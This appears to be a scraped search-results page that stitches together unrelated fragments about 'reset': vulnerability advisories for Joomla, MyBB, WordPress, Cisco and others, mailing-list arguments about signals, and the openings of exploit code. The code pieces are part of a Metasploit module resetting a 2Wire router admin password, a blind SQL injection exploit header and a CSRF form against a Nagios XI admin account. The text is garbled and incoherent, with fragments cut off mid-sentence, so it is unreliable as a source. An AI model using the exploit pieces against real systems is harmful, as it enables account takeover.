Next Page >>
reset
www.sektioneins.de
-= Security Advisory =-
Advisory: Joomla Weak Random Password Reset Token Vulnerability
Release Date: 2008/09/11
Last Modified: 2008/09/11
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: Joomla <= 1.5.7
SektionEins GmbH
www.sektioneins.de
-= Security Advisory =-
Advisory: MyBB Password Reset Weak Random Numbers Vulnerability
Release Date: 2010/04/13
Last Modified: 2010/04/13
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: MyBB <= 1.4.11
Release Date: 2008/09/12
Last Modified: 2008/09/12
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: Wordpress <= 2.6.1
Severity: MySQL column truncation allows resetting the passwords of
wordpress users to random strings. Combined with weaknesses
in PHP's PRNG this allows determining the admin password.
Risk: High
Vendor Status: Vendor has released Wordpress 2.6.2 which fixes this issue
Reference: http://www.sektioneins.de/advisories/SE-2008-05.txt
3. *Vulnerability Description*
ManageEngine ADSelfService Plus [1] is a secure, web-based, end-user
password reset management program. This software helps domain users to
perform self service password reset, self service account unlock and
employee self update of personal details (e.g. telephone numbers, etc)
in Microsoft Windows Active Directory. Administrators find it easy to
automate password resets, account unlocks while managing optimizing the
expenses associated with helpdesk calls.
SektionEins GmbH
www.sektioneins.de
-= Security Advisory =-
Advisory: MyBB Password Reset Email BCC: Injection Vulnerability
Release Date: 2010/04/13
Last Modified: 2010/04/13
Author: Stefan Esser [stefan.esser[at]sektioneins.de]
Application: MyBB <= 1.4.11
is only about 32768 possible filenames and therefore simple bruteforce
can reveal valid path to uploaded file.
###############################################################################
7. Admin Password Reset Vulnerability
###############################################################################
Reason: using of "rand()" function, which has known weaknesses
Preconditions:
1. Windows platform
OS to guarantee certain behaviours. The problem here is that there is
a mechanism which causes a guarantee to be violated.
> > Also, other signals which could be triggered by the predecessor (e.g.
> > SIGALRM triggered due to alarm() followed by exec()) can normally be
> > prevented by specific means (e.g. resetting any outstanding timers).
> > This bug means that such steps are insufficient.
> >
> > A consequence of this bug is that no signal can be trusted.
>
> Sure.
no matter how. Well written program must not depend on anything that is out of
it's control.
> Also, other signals which could be triggered by the predecessor (e.g.
> SIGALRM triggered due to alarm() followed by exec()) can normally be
> prevented by specific means (e.g. resetting any outstanding timers).
> This bug means that such steps are insufficient.
>
> A consequence of this bug is that no signal can be trusted.
>
Sure.
attached is a metasploit module I coded to reset the admin password on a 2wire wireless router. enjoy
==============================================================================================
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize
super(
'Name' => '2Wire Password Reset',
'Version' => '$Revision: 1 $',
Administrators can determine the status of their device by using the
Serial Number Validator located at the following link:
http://serialnumbervalidation.com/PSIRT-20111026
The Serial Number Validator tool will indicate if the device was
affected when the product was shipped. If a factory reset or software
upgrade occurred or certain manual configuration changes were made,
the device may not be affected.
Products Confirmed Not Vulnerable
+--------------------------------
> many, many, many other ways.
All of these are known, documented behaviours. The signals involved
can be blocked or ignored, and the mechanisms which send those signals
can be disabled (tcsetattr() can disable Ctrl-C etc, unused
descriptors can be closed, timers can be reset, etc).
Setuid programs will normally take such steps at startup if they have
critical sections which should avoid being interrupted (e.g. to
prevent stale lock files).
goals are to be faster, smaller and less graphically intensive as
compared to other discussion boards. PunBB has fewer features
than many other discussion boards, but is generally faster and
outputs smaller, semantically correct XHTML-compliant pages."
PunBB comes with a password reset feature that allows resetting a
forgotten password. When a password reset is requested an email
is sent to the user containing a new random password and an
activation link that needs to be visited in order for the password
change to become effective.
Sawmill suffers from multiple critical vulnerabilities which allow an
_unauthenticated_ attacker to gain administrative rights. Furthermore
it is possible to access (RW) the file system and execute arbitrary
commands on the operating system without authentication.
Attackers with valid accounts are able to reset the root password or
add/delete log profiles, view and manipulate admin settings etc.
It must be noted that further vulnerabilities are to be expected
within the software (such as buffer overflows, etc.). Due to lack of
time no further vulnerabilities could be searched.
only be generated by kill()) can only be received as a result of an
action by a sufficiently privileged process.
Also, other signals which could be triggered by the predecessor (e.g.
SIGALRM triggered due to alarm() followed by exec()) can normally be
prevented by specific means (e.g. resetting any outstanding timers).
This bug means that such steps are insufficient.
A consequence of this bug is that no signal can be trusted.
Also, if it's possible to set the signal to one which cannot be
controller and the TV panel become slow and then completely
inactive), it just doesn't accept inputs
- after other 5 seconds the TV restarts automatically
- this situation will continue forever
During these continuous reboots it's not even possible to reset the
device (for example the "EXIT" button for 15 seconds can't work in
this state) or doing other operations allowed by the normal users
without affecting the warranty.
This is not a simple temporary Denial of Service, the TV is just
match request arg length gt 15
!
!
policy-map type inspect http layer7-policymap
class type inspect http layer7-classmap
reset
log
policy-map type inspect layer4-policymap
class type inspect layer4-classmap
inspect
service-policy http layer7-policymap
Summary
It is possible for a non admin user to gain admin privileges on
bytehoard 2.1, by overwriting a session variable if the php option
"register_globals" is enabled. This variable can be overwritten by
abusing the "register user" or the "password reset" module.
Impact
A non-admin user can gain admin privileges, access another accounts and
do operations under nonexistent accounts.
Protocol (BGP) feature. The vulnerability manifests itself when a BGP
peer announces a prefix with a specific, valid but unrecognized
transitive attribute. On receipt of this prefix, the Cisco IOS XR
device will corrupt the attribute before sending it to the
neighboring devices. Neighboring devices that receive this corrupted
update may reset the BGP peering session.
Affected devices running Cisco IOS XR Software corrupt the
unrecognized attribute before sending to neighboring devices, but
neighboring devices may be running operating systems other than Cisco
IOS XR Software and may still reset the BGP peering session after
2WIRE GATEWAY AUTHENTICATION BYPASS & PASSWORD RESET
====================================================
DESCRIPTION
-----------------
There is an authentication bypass vulnerability in page=CD35_SETUP_01
that allows you to set a new password even if the password was
previously set.
logically separated from the optical data network and isolated from
the Internet. This limits the exposure to the exploitation of this
vulnerability from the Internet.
A crafted stream of TCP traffic to the control cards on a node will
result in a reset of the corresponding control cards on this node. A
complete 3-way handshake is required on any open TCP port to be able
to exploit this vulnerability.
The timing for the data channels traversing the switch is provided by
the control cards.
+-------------------------------------------------------------------+
Workarounds
===========
Administrators are advised to reset both the admin and root passwords
with the following commands:
Reset Root User Password:
rootsettings on <password>
#!/usr/bin/python
#--------------------------------------------------------------------------------
#(POST var 'resetpwemail') BLIND SQL INJECTION EXPLOIT --AlumniServer v-1.0.1-->
#--------------------------------------------------------------------------------
#
#CMS INFORMATION:
#
#-->WEB: http://www.alumniserver.net/
#-->DOWNLOAD: http://www.alumniserver.net/
#-->DEMO: N/A
- ---------------------------------------------------------------------
Summary
=======
Cisco IOS XR will reset a Border Gateway Protocol (BGP) peering
session when receiving a specific invalid BGP update.
The vulnerability manifests when a BGP peer announces a prefix with a
specific invalid attribute. On receipt of this prefix, the Cisco IOS
XR device will restart the peering session by sending a notification.
Description
-----------
pyForum is a 100% python-based message board system based in the excellent web2py framework.
We have discovered a backdoor in PyForum. Anyone could force a password reset on behalf of other users whose emails are known. More importantly, the software author, specifically, can obtain the new Administrator's password remotely.
The problem is in module ``forumhelper.py``. A new password is generated and saved in the database. Then a notification email which contains this new password in plaintext is sent to the user. There is no password reset confirmation code or similar verification action required. This causes a mild annoyance, or at most an account lockout.
When it comes to Administrator account, however, the problem is more severe. This default account's email is set to ``administrator@pyforum.org`` and can only be changed directly in the database. Therefore, new password is sent to the software author by default. And since this email address is known, everyone can request a password reset easily.
It starts where Stefan Esser's wonderful article "mt_srand and not so random numbers" ( http://www.suspekt.org/2008/08/17/mt_srand-and-not-so-random-numbers/ ) ended.
I've made some improvements to his idea. Since mt_srand()/mt_rand() are very slow (~17 hours to try all possible 2^32 seeds on my AMD Phenom 2.6 ghz machine) and lookup tables are huge (at least 32 GB), I implemented rainbow tables. With a chain length of 10000 and 512k rows, the table size is 11MB and average search takes only about 35 min. Rainbow table parameters can be tuned (longer chains = less space, but slower seed crack, shorter chains and more rows = more space, but less time to crack the seed).
Since it's about password reset attacks, time to predict the random string is crucial for the effectiveness of the attack.
I also demonstrate a real PoC against installations of PHP-Nuke and PunBB hosted on a same server with keep-alives enabled. In my example, it took 7 minutes and 4 HTTP requests to reset the PunBB's admin password by predicting the "password reset" URL.
I also gave my ideas cents on how those attacks can be improved even further (e.g comparing sequences of PRNs instead of just the last values in case we have pseudorandom numbers generated in a smaller interval like mt_rand(1,1000);)
of the applications functionality is accessible via a front end web application.
II. DETAILS
Multiple CSRF vulnerabilities exist that can allow for arbitrary
commands to be executed on the Zenoss server as well as reset the Zenoss
admin password.
Attack scenario: If an administrator has an active Zenoss
session and visits one of these links or visits a malicious page that
contains resources to point to these URL's
>
I disagree with you in that. Any hard guarantee can be given only by God.
I repeat, signals are in general not a reliable information source since they
can be generated in a couple of ways, even by an unkind superuser :-) .
> > In fact, PDEATHSIG should be reset for every binary, not just suid/sgid, since
> > it emits signal that exec()ed program may not expect.
>
> Are you talking about the parent exec()ing or the child?
>
No matter.
> access at all times of that Asus netbook it's arguably more secure in
> some circumstances.
Not just XP Home. I can confirm that this "vulnerability" is a standard feature
of several OEM and MS released versions of both XP Home and XP Professional.
In both cases I've had to manually re-set the password to something.
This seems to be a "feature" - since if you have to use the recovery console
it'll ask you for the password for "Administrator"... by default it's blank
and you can just hit enter.
> Description
> -----------
>
> pyForum is a 100% python-based message board system based in the excellent web2py framework.
>
> We have discovered a backdoor in PyForum. Anyone could force a password reset on behalf of other users whose emails are known. More importantly, the software author, specifically, can obtain the new Administrator's password remotely.
>
> The problem is in module ``forumhelper.py``. A new password is generated and saved in the database. Then a notification email which contains this new password in plaintext is sent to the user. There is no password reset confirmation code or similar verification action required. This causes a mild annoyance, or at most an account lockout.
>
> When it comes to Administrator account, however, the problem is more severe. This default account's email is set to ``administrator@pyforum.org`` and can only be changed directly in the database. Therefore, new password is sent to the software author by default. And since this email address is known, everyone can request a password reset easily.
>
that themselves.
Technical Details
Reset the nagiosadmin password via CSRF
This can be useful to hijack the administrators account.
<input type='button' id='adminpassword' value='Set nagiosadmin Password'/>
<form name="adminpasswordform"
action="http://10.0.10.28/nagiosxi/account/main.php?page=acctinfo"
Next Page>>
|
